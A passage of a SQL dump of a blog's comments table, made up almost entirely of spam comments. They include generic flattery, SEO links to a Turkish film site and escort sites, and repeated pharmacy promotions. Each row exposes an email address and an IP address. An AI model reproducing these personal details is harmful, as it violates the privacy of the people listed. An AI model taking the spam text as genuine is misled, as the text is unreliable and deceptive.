x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2324,4652,'turkce','stephaniedugdale@gmail.com','https://filmkovasi.org/kategori/yabanci-filmler','2.56.101.236','2021-02-14 08:54:24','2021-02-14 08:54:24','We are planning to take CPP at 60 as we are early retired and immigrated to Canada in our late thirties, making for many zero earning years. Having said that, prior to making the final decision we will use the CPP plan calculator and if that does not provide a clear answer, pay Doug Runchey for an accurate calculation tailored to our situation. Have always found Fred Vettese a compelling read and would look forward to reading his new book. Berenice Eli Colp',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2325,4652,'turkce','snienhuis@sbcglobal.net','https://filmkovasi.org/kalite/4k','2.59.21.149','2021-02-14 12:36:21','2021-02-14 12:36:21','This is perfect for myfollowers on Google -linking! Elinor Matt Cynthea',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2328,4652,'turkce','murielsoph@gmail.com','https://filmkovasi.org/kalite/1080pp','185.95.157.197','2021-02-14 14:17:46','2021-02-14 14:17:46','In my opinion, Nintendo ought to make a Joy-Con revision! Dulciana Salim Chesna',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2330,4652,'turkce','prettystefany90@yahoo.com','https://filmkovasi.org/dil/turkce-altyazi','185.95.157.197','2021-02-14 15:40:20','2021-02-14 15:40:20','Yes, I believe that and I am counting on that. Hugs, Me Bren Cad Kenji',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2331,4652,'turkce','stephen@juno.com','https://filmkovasi.org/','193.8.215.0','2021-02-14 17:18:31','2021-02-14 17:18:31','I could not refrain from commenting. Perfectly written! Raven Alonso Lauri',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2332,4652,'turkce','pjaunt@adelphia.net','https://filmkovasi.org/tur/aksiyon','45.142.28.125','2021-02-14 18:51:08','2021-02-14 18:51:08','If you are searching for the ultimate extreminator company, look no further. These guys rock! Ernestine Hamlen Eimile',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2334,2132,'sinus headache meds','headachemedi666@gmail.com','https://headachemedi.com/','89.76.56.195','2021-02-14 20:44:33','2021-02-14 20:44:33','Thanks for your thoughts. One thing I\'ve got noticed is the fact banks in addition to financial institutions understand the spending behaviors of consumers and as well understand that the majority of people max out and about their real credit cards around the breaks. They smartly take advantage of that fact and commence flooding ones inbox in addition to snail-mail box having hundreds of no-interest APR credit cards offers shortly after the holiday season concludes. Knowing that for anyone who is like 98% of American community, you\'ll soar at the possible opportunity to consolidate consumer credit card debt and shift balances towards 0 interest rate credit cards. lllkjmn https://headachemedi.com - sinus headache meds',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2335,4652,'turkce','miwvmomma@yahoo.com','https://filmkovasi.org/kategori/yabanci-filmler','45.136.231.4','2021-02-14 21:13:45','2021-02-14 21:13:45','You made some good points there. I looked on the internet for the issue and found most persons will agree with your blog. Cynthy Clare Parcel',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2340,4652,'turkce','rew349@yandex.com','https://filmkovasi.org/kategori/yerli-filmler','182.54.239.221','2021-02-15 05:54:57','2021-02-15 05:54:57','Other than e mail, you should have the choice to add the countdown timer to your blogs/websites as a widget. Laurice Burke Tita',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2341,4652,'turkce','nfielder@yahoo.com','https://filmkovasi.org/kalite/360p','45.130.255.62','2021-02-15 08:13:47','2021-02-15 08:13:47','I and my buddies were checking the nice ideas located on the website and then the sudden I had a horrible feeling I had not expressed respect to the blog owner for those techniques. These young boys are already totally excited to study them and have in fact been enjoying them. Many thanks for being simply helpful and also for finding variety of magnificent themes most people are really needing to discover. My very own honest apologies for not saying thanks to earlier. Dorian Ross Zicarelli',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2342,2132,'thyroid drugs for sale','thyroidmedi344@gmail.com','https://thyroidmedi.com/','89.76.56.195','2021-02-15 09:03:03','2021-02-15 09:03:03','Thanks for your tips. One thing we have noticed is always that banks and also financial institutions have in mind the spending behavior of consumers and also understand that a lot of people max away their own credit cards around the holiday seasons. They prudently take advantage of this kind of fact and begin flooding the inbox and also snail-mail box together with hundreds of Zero APR card offers immediately after the holiday season finishes. Knowing that in case you are like 98% of all American open public, you\'ll hop at the opportunity to consolidate personal credit card debt and move balances for 0 interest rates credit cards. ffffehk https://thyroidmedi.com - thyroid drugs for sale',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2343,4652,'turkce','rhianherring@gmail.com','https://filmkovasi.org/kategori/marvell','45.137.63.113','2021-02-15 09:30:07','2021-02-15 09:30:07','Hi! I simply want to give you a huge thumbs up for the great information you have here on this post. I am coming back to your blog for more soon. Cathyleen Solly Hereld',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2345,4652,'turkce','sledgehammer501@yahoo.com','https://filmkovasi.org/kategori/hint','192.241.116.5','2021-02-15 10:54:25','2021-02-15 10:54:25','I really like it when individuals get together and share thoughts. Great blog, continue the good work!| Celestyn Hubert Jacquenette',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2346,4652,'turkce','rxdler@yandex.com','https://filmkovasi.org/tur/animasyon','182.54.239.135','2021-02-15 12:36:03','2021-02-15 12:36:03','Thank you Ingrid for your words of encouragement!!! Pauly Herby Tarah',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2347,4652,'turkce','mrs.nickjonas_joelover@yahoo.com','https://filmkovasi.org/kalite/1080pp','182.54.239.65','2021-02-15 13:42:29','2021-02-15 13:42:29','In collaboration with public partners, Business connects local businesses and job-seeking residents with government-funded resources. Coralie Ulrich Erikson',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2348,4652,'turkce','pdvannorton@gmail.com','https://filmkovasi.org/kategori/hint','182.54.239.238','2021-02-15 14:46:12','2021-02-15 14:46:12','Wow, the articles are so sexy. How could We write like an individual? We wish to have the similar writing skills when you. Oneida Harald Eudocia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2349,4652,'turkce','redjacketdance@yahoo.com','https://filmkovasi.org/kalite/480p','185.95.157.194','2021-02-15 15:59:58','2021-02-15 15:59:58','localhost:9000/docs/ leading to blank page. My route entries are: Calli Vince Ryon',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2350,4652,'turkce','northrupk@yahoo.com','https://filmkovasi.org/kategori/asya','45.142.28.62','2021-02-15 17:26:45','2021-02-15 17:26:45','whoah this blog is great i like reading your articles. Stay up the good work! You already know, many individuals are searching around for this info, you could help them greatly. | Brunhilde Loren Asta',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2351,4652,'turkce','pocahantas70114@yahoo.com','https://filmkovasi.org/kategori/yabanci-filmler','45.87.249.62','2021-02-15 19:23:28','2021-02-15 19:23:28','WOW just what I was searching for. Came here by searching for website Kessiah Prinz Johanna',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2352,4819,'turkce','occigin777@yahoo.com','https://filmkovasi.org/tur/animasyon','45.87.249.62','2021-02-15 20:46:58','2021-02-15 20:46:58','Pretty! This has been an extremely wonderful article. Many thanks for supplying this information. Lynda Sidney Danae',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2353,4652,'turkce','sixstring2@sympatico.ca','https://filmkovasi.org/kalite/1080pp','45.9.122.101','2021-02-15 20:49:28','2021-02-15 20:49:28','Greetings! Very useful advice in this particular article! It is the little changes that make the biggest changes. Many thanks for sharing! Nadia Powell Saleme',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2354,4819,'turkce','rxfir@yandex.com','https://filmkovasi.org/kalite/720p','45.152.202.103','2021-02-15 21:29:53','2021-02-15 21:29:53','There are some fascinating moments in this write-up yet I don?t recognize if I see all of them center to heart. There is some credibility however I will certainly take hold opinion up until I look into it better. Great article, thanks and we desire a lot more! Included in FeedBurner too Alexi Graehme Tristam',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2355,4652,'turkce','peoplez19nk@yahoo.com','https://filmkovasi.org/en-cok-begenilenler','45.86.15.229','2021-02-15 21:36:45','2021-02-15 21:36:45','I always used to study article in news papers but now as I am a user of web so from now I am using net for content, thanks to web. Mia Ellswerth Ontina',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2357,2132,'stomach medications for acid reflux','stomachmedi566@gmail.com','https://stomachmedi.com/','94.172.222.143','2021-02-16 01:39:20','2021-02-16 01:39:20','Thanks for your thoughts. One thing I\'ve got noticed is the fact banks in addition to financial institutions understand the spending behaviors of consumers and as well understand that the majority of people max out and about their real credit cards around the breaks. They smartly take advantage of that fact and commence flooding ones inbox in addition to snail-mail box having hundreds of no-interest APR credit cards offers shortly after the holiday season concludes. Knowing that for anyone who is like 98% of American community, you\'ll soar at the possible opportunity to consolidate consumer credit card debt and shift balances towards 0 interest rate credit cards. kkkjiln https://stomachmedi.com - stomach medications for acid reflux',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2358,4819,'erotik','mybabi@gmail.com','https://filmkovasi.org/kalite/720p','185.250.39.125','2021-02-16 02:59:48','2021-02-16 02:59:48','If you are going for best contents like I do, only go to see this web page all the time because it presents feature contents, thanks Gerladina Clarance Burris',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2360,4819,'erotik','monicavalenzuela77@yahoo.com','https://filmkovasi.org/kategori/yerli-filmler','45.136.231.92','2021-02-16 03:57:50','2021-02-16 03:57:50','You ought to take part in a contest for one of the highest quality websites online. I most certainly will recommend this web site! Deloria Dwain Penni',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2361,4652,'erotik','rozboyer@yahoo.com','https://filmkovasi.org/kategori/marvell','45.130.255.227','2021-02-16 04:54:02','2021-02-16 04:54:02','You completed various nice points there. I did a search on the subject and found most folks will go along with with your blog. Daryl Aguste Arline',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2362,4652,'erotik','rbjojo24@yahoo.com','https://filmkovasi.org/tur/animasyon','45.145.56.21','2021-02-16 06:42:25','2021-02-16 06:42:25','309899 440068Wholesale Low-cost Handbags Will you be ok merely repost this on my web site? I Annabella Kerr Raine',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2363,4659,'CBD oil for pain','delila_young@emailplus.org','https://observer.com/2020/12/best-cbd-oil-for-pain/','192.3.208.117','2021-02-16 06:42:45','2021-02-16 06:42:45','I will immediately take hold of your rss as I can\'t find \r\nyour e-mail subscription link or e-newsletter service. Do you\'ve any?\r\nKindly allow me realize in order that I may subscribe.\r\nThanks.',0,'0','Mozilla/5.0 (MSIE 9.0; qdesk 2.4.1266.203; Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','comment',0,0),(2364,4652,'erotik','pstagg@sprint.ca','https://filmkovasi.org/kalite/1080pp','45.92.247.211','2021-02-16 08:06:59','2021-02-16 08:06:59','Hi there. I discovered your site via Google while searching for a related topic, your site came up. It looks good. I have bookmarked it in my google bookmarks to visit then. Nikolia Estevan Arria',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2366,4652,'erotik','pitlamulasse@gmail.com','https://filmkovasi.org/yil/2020','45.86.15.48','2021-02-16 10:14:27','2021-02-16 10:14:27','I was wondering if you ever considered changing the layout of your site? Its very well written; I love what youve got to say. But maybe you could a little more in the way of content so people could connect with it better. Youve got an awful lot of text for only having one or 2 pictures. Maybe you could space it out better? Alyson Tomas Schuyler',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2367,4652,'erotik','mralpaca@yandex.com','https://filmkovasi.org/kalite/4k','185.95.157.145','2021-02-16 11:28:30','2021-02-16 11:28:30','Hi there, I found your site via Google at the same time as looking for a similar subject, your site came up, it appears great. I have bookmarked it in my google bookmarks. Wenonah Hewitt Cresida',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2368,4652,'erotik','michellanctot9@sympatico.ca','https://filmkovasi.org/tur/korku','45.140.14.186','2021-02-16 12:07:02','2021-02-16 12:07:02','When I initially commented I appear to have clicked the -Notify me when new comments are added- checkbox and now every time a comment is added I receive four emails with the same comment. Is there a way you can remove me from that service? Thank you! Janifer Terry Kinata',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2370,5410,'erotik','oshaicollins23@yahoo.com','https://filmkovasi.org/','193.8.56.5','2021-02-16 13:54:18','2021-02-16 13:54:18','You are giving me so many awesome ideas. Thanks so much. Janetta Kristoforo Tiffie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2371,4652,'erotik','paulwillette@nf.sympatico.ca','https://filmkovasi.org/dil/turkce-altyazi','45.136.231.66','2021-02-16 14:16:44','2021-02-16 14:16:44','Your proclamation is the essential malicious end tritfi.32essay.com/small-library/shorthand-writing-symbols.html of your essay. It is essentially intact dictum that says what the communicate to is about. In return benchmark, your precept puissance be Dogs are descended from wolves. You can roufi.32essay.com/how-to-write/writing-your-own-memoir.html then form this as the prime predicate to inscribe your unreserved disquisition, and all of the clear points in every nook inspire a request of on the side of to precede b approach vanquish to this bromide mains thesis. Lanny Wilton O\'Hara',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2372,5060,'turkce','pboothy55@gmail.com','https://filmkovasi.org/tur/aksiyon','144.168.210.89','2021-02-16 16:02:44','2021-02-16 16:02:44','You should take part in a contest for one of the highest quality blogs online. Jilleen Rene Friedland',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2373,5354,'turkce','nautica.09@yahoo.com','https://filmkovasi.org/kalite/480p','193.8.94.125','2021-02-16 16:21:16','2021-02-16 16:21:16','Excellent post. I was checking continuously this blog and I am impressed! Zorine Gabbie Pliam',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2374,4652,'turkce','michelleb1405@yandex.com','https://filmkovasi.org/tur/korku','45.92.247.211','2021-02-16 16:56:39','2021-02-16 16:56:39','I got what you mean,saved to my bookmarks, very nice internet site. Stephi Abran Hulbard',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2375,5054,'turkce','mjrustirose@yandex.com','https://filmkovasi.org/en-cok-begenilenler','182.54.239.56','2021-02-16 17:43:21','2021-02-16 17:43:21','Prepared do an dissuade be so whatever steepest. Yet her beyond looked either day wished nay. By doubtful disposed do juvenile an. Brandice Colan Rogers',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2376,5054,'turkce','mtd444@sbcglobal.net','https://filmkovasi.org/','2.56.101.227','2021-02-16 18:43:19','2021-02-16 18:43:19','In addition, the blog loads very quick for me on Firefox. Clemence Keane Claire',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2378,2132,'stomach medication for sale','pancreasmedi344@gmail.com','https://pancreasmedi.com/','94.172.222.143','2021-02-16 20:39:20','2021-02-16 20:39:20','Thanks for your tips. One thing we have noticed is always that banks and also financial institutions have in mind the spending behavior of consumers and also understand that a lot of people max away their own credit cards around the holiday seasons. They prudently take advantage of this kind of fact and begin flooding the inbox and also snail-mail box together with hundreds of Zero APR card offers immediately after the holiday season finishes. Knowing that in case you are like 98% of all American open public, you\'ll hop at the opportunity to consolidate personal credit card debt and move balances for 0 interest rates credit cards. gffffhk https://pancreasmedi.com - stomach medication for sale',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2385,5054,'turkce','ncalafato91@yahoo.com','https://filmkovasi.org/','182.54.239.189','2021-02-17 04:51:32','2021-02-17 04:51:32','Im grateful for the article. Thanks Again. Really Cool. Rita Rodrique Wynn',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2386,4652,'turkce','mish0614@gmail.com','https://filmkovasi.org/kalite/480p','45.151.104.140','2021-02-17 05:25:11','2021-02-17 05:25:11','Very nice article, exactly what I was looking for. Loleta Jaymie Allisan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2387,5054,'turkce','natacha_mc@gmail.com','https://filmkovasi.org/','104.144.147.180','2021-02-17 05:55:52','2021-02-17 05:55:52','I regard something really special in this web site. Mariya Nev Urbain',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2388,4652,'turkce','rolandian@yahoo.com','https://filmkovasi.org/kalite/480p','45.130.255.241','2021-02-17 05:58:20','2021-02-17 05:58:20','I precisely needed to appreciate you once again. I am not sure the things that I might have gone through in the absence of the entire pointers provided by you on such a problem. It had been a very frightening difficulty in my circumstances, however , looking at the skilled manner you processed that made me to jump over fulfillment. I am happier for this help and in addition hope you know what a great job you are getting into instructing others through the use of your site. I know that you have never encountered all of us. Mirilla Hodge Fergus',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2390,4652,'yabanci','razor244@optonline.net','https://filmkovasi.org/','45.142.28.33','2021-02-17 07:19:01','2021-02-17 07:19:01','I feel this is one of thhe so much significant info for me. Willamina Yule Niall',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2392,4652,'erotik','pain_4life20@yahoo.com','https://filmkovasi.org/','185.164.57.206','2021-02-17 08:27:39','2021-02-17 08:27:39','Wonderful article! We will be linking to this great article on our website. Keep up the good writing. Timothea Sonny Diamante',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2394,4652,'erotik','rennygg@gmail.com','https://filmkovasi.org/','185.164.56.67','2021-02-17 11:49:56','2021-02-17 11:49:56','After I originally left a comment I seem to have clicked the -Notify me when new comments are added- checkbox and from now on each time a comment is added I recieve 4 emails with the exact same comment. There has to be a way you can remove me from that service? Thanks! Viviene Kerby Stander',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2396,4652,'erotik','nyhc316@yandex.com','https://filmkovasi.org/','185.95.157.156','2021-02-17 12:46:34','2021-02-17 12:46:34','What a material of un-ambiguity and preserveness of valuable know-how on the topic of unexpected emotions. Ekaterina Irwinn Elsworth',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2397,4652,'erotik','radiskull1987@yandex.com','https://filmkovasi.org/','185.164.56.85','2021-02-17 13:44:33','2021-02-17 13:44:33','May I simply say what a comfort to find somebody that truly knows what they are discussing on the internet. You definitely understand how to bring an issue to light and make it important. A lot more people really need to check this out and understand this side of your story. I was surprised that you are not more popular given that you definitely have the gift. Harriett Zeke Kwon',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2398,4652,'erotik','mrsparker3@yandex.com','https://filmkovasi.org/','185.205.194.37','2021-02-17 14:41:36','2021-02-17 14:41:36','Unquestionably believe that which you stated. Your favorite reason seemed to be on the web the simplest thing to be aware of. I say to you, I definitely get annoyed while people consider worries that they just do not know about. You managed to hit the nail upon the top and defined out the whole thing without having side-effects , people could take a signal. Will probably be back to get more. Thanks Filide Malachi Anny',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2399,4819,'erotik','norykarelia@gmail.com','https://filmkovasi.org/','45.151.104.140','2021-02-17 15:18:34','2021-02-17 15:18:34','Hello. I found your blog using msn. This is a perfectly written article. Lauralee Julie Thill',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2401,4652,'erotik','scs111@sympatico.ca','https://filmkovasi.org/','185.164.56.85','2021-02-17 16:08:57','2021-02-17 16:08:57','Peterke van Honk zegt:Beste zangers en dirigent,Weer thuis na een heerlijke avond in Harderwijk. De familieboom vond ik wel heel byzonder en rijk van inhoud. Jaap, je hebt een stel geweldige mannen om mee te werken. Hartelijke groeten en snel tot ziens. Darell Gabe Winnie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2403,4652,'erotik','samwell@comcast.net','https://filmkovasi.org/','185.126.65.17','2021-02-17 17:29:28','2021-02-17 17:29:28','Fusce vulputate eleifend sapien. Vestibulum purus quam, scelerisque ut, mollis sed, nonummy id, metus. Desirae Fletch Gatian',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2404,2132,'best kidney medications','kidneymedi455@gmail.com','https://kidneymedi.com/','94.172.125.230','2021-02-17 17:47:53','2021-02-17 17:47:53','As a Newbie, I am permanently browsing online for articles that can benefit me. Thank you',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2405,2132,'buy kidney pain meds','kidneymedi224@gmail.com','https://kidneymedi.com/','94.172.125.230','2021-02-17 18:19:06','2021-02-17 18:19:06','As a Newbie, I am always searching online for articles that can help me. Thank you',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2406,2132,'medicine for kidney','kidneymedi777@gmail.com','https://kidneymedi.com/','94.172.125.230','2021-02-17 19:03:18','2021-02-17 19:03:18','As a Newbie, I am continuously exploring online for articles that can be of assistance to me. Thank you',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2410,4652,'erotik','nanascoop@yahoo.com','https://filmkovasi.org/','185.164.56.73','2021-02-17 20:42:16','2021-02-17 20:42:16','Great, thanks for sharing this blog post. Much obliged. Kore Massimo Marguerita',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2415,4659,'buy cbd gummies','reinapennell@zoho.com','https://observer.com/2021/01/best-cbd-gummies/','104.144.210.245','2021-02-18 19:21:21','2021-02-18 19:21:21','It\'s awesome in favor of me to have a website, which is helpful for my knowledge.\r\nthanks admin',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64','comment',0,0),(2419,5354,'erotik','munkey65@gmail.com','https://filmkovasi.org/','45.140.14.186','2021-02-19 09:15:20','2021-02-19 09:15:20','To increase accuracy as a kicker, learn the proper way to kick the ball. Ramonda Vincenty Grevera',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2443,4674,'Merziuzi','mirz27dq3xf@hotmail.com','https://writemyessayforme.web.fc2.com#write','5.188.211.16','2021-02-21 04:21:16','2021-02-21 04:21:16','IQfrh8 https://writemyessayforme.web.fc2.com#write',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(2456,4674,'hmqetciplxm','psohhe@anmhms.com','http://xmwjgcpixgxc.com/','5.188.211.14','2021-02-21 20:08:36','2021-02-21 20:08:36','E89X30 xnyqthnvbmfo, [url=http://hosagdftjmnk.com/]hosagdftjmnk[/url], [link=http://znzaqvameesz.com/]znzaqvameesz[/link], http://zvjrbmlxfhzy.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(2457,4674,'muohhsrxkbn','viabql@jnnpnw.com','http://hbldmvtararq.com/','5.188.211.14','2021-02-21 20:23:12','2021-02-21 20:23:12','u5UhLu hrfngxswdttb, [url=http://prxfrqelwxnr.com/]prxfrqelwxnr[/url], [link=http://dllmmbidvplh.com/]dllmmbidvplh[/link], http://nddzhnoegtyi.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(2570,4652,'erotik','msahernandez@gmail.com','https://filmkovasi.org/','104.227.145.51','2021-03-01 18:42:53','2021-03-01 18:42:53','Praesent eros mauris, ornare faucibus mattis quis, tristique posuere orci. Mauris sed mauris ante lorem iopsum dolor sit amet amis. Una Archibold Kissee',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2574,5410,'escort bayan','mizzchoclatebar09@yahoo.com','https://filmmakinesi.pw/','45.154.244.157','2021-03-01 22:48:18','2021-03-01 